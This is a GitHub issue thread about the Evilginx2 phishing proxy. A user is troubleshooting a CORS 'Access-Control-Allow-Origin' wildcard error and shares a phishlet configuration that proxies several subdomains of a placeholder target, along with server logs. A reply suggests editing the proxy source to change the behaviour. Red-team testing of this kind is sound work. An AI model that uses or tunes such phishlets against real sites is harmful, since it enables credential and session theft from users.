Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

'Access-Control-Allow-Origin' header in the response must not be the wildcard #291

Closed
DavidGrahambell opened this issue May 2, 2019 · 1 comment
Closed

'Access-Control-Allow-Origin' header in the response must not be the wildcard #291

DavidGrahambell opened this issue May 2, 2019 · 1 comment

Comments

@DavidGrahambell
Copy link

DavidGrahambell commented May 2, 2019
edited
Loading

Hi,

First of all, I would like to thank you for your efforts on this tool. I have a little question that;

I have config with three subdomains similar to facebook and I get "'Access-Control-Allow-Origin' header in the response must not be the wildcard" error for one of my phishing_subs.. I have checked following similar issue and can verify that I have unique phis_sub values..

#244

I just wonder that under what circumstances Evilginx2 can't pass origin policy?

Best regards,

Phislet summary

min_ver: '2.3.0'
proxy_hosts:

  • {phish_sub: 'www', orig_sub: 'www', domain: 'mytarget.com', session: true, is_landing: true}
  • {phish_sub: 'static', orig_sub: 'static', domain: 'mytarget-be.com', session: false, is_landing: false}
  • {phish_sub: 'user', orig_sub: 'user', domain: 'mytarget-be.com', session: false, is_landing: false}
    sub_filters:
  • {triggers_on: 'www.mytarget.com', orig_sub: 'www', domain: 'mytarget.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', ..}
  • {triggers_on: 'www.mytarget.com', orig_sub: 'static', domain: 'mytarget-be.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', ..}
  • {triggers_on: 'www.mytarget.com', orig_sub: 'user', domain: 'mytarget-be.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', ..}
  • {triggers_on: 'static.mytarget-be.com', orig_sub: 'static', domain: 'mytarget-be.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', ..}
  • {triggers_on: 'user.mytarget-be.com', orig_sub: 'user', domain: 'mytarget-be.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', ..}

When I check legitimate and phissed requests on my webserver, I can see that origin header is set properly as ""https://www.mytarget.com/""

x.x.x.x - - x.x.x.x - - [02/May/2019:10:47:44 +0300] "OPTIONS /api/modules/GetAppModule HTTP/1.1" 204 0 "https://www.mytarget.com/" "653" "/api/modules/GetAppModule" "Safari/537.36" "-" "https://www.mytarget.com"

y.y.y.y - - y.y.y.y - - [02/May/2019:10:50:33 +0300] "OPTIONS /api/modules/GetAppModule HTTP/1.1" 204 0 "https://www.mytarget.com/" "671" "/api/modules/GetAppModule" "Safari/537.36" "-" "https://www.mytarget.com"

counsole out

debug_out.txt
@hash3liZer
Copy link

If the response from a website returns a CSP policy then, i think it's great to return the wildcard in the Access-Control header. However, you can change this behaviour by editing one or more lines in the http_proxy.go file. Here's the thread:

#280

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@DavidGrahambell @kgretzky @hash3liZer